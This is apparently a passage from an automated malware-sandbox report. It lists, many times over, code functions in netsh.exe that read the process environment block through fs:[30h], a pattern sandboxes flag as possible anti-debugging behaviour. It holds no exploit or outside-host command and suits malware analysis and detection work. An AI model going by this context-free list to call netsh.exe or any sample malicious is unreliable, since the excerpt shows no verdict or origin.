          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03734BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03734BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03732397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037BD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03711B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03711B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0374927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037BB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037BB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03794257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03709240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03709240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03709240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03709240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03744A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03744A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03705210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03705210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03705210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03705210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03723A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03718A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03732AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03732ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03724120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03724120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03724120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03724120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03724120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03709100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03709100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03709100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037941E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037869A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03732990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03720050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03720050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03787016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03787016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03787016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037058EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037490AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03709080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03783884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03783884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03704F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03704F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037437F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03718794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03787794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03787794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03787794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037BFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03738E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037316E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037176E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03748EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037BFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037336CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037846A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03727D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03743D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03783540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037B3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03734D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03734D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03734D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0378A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037B8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786DC9 mov ecx, dword ptr fs:[00000030h]
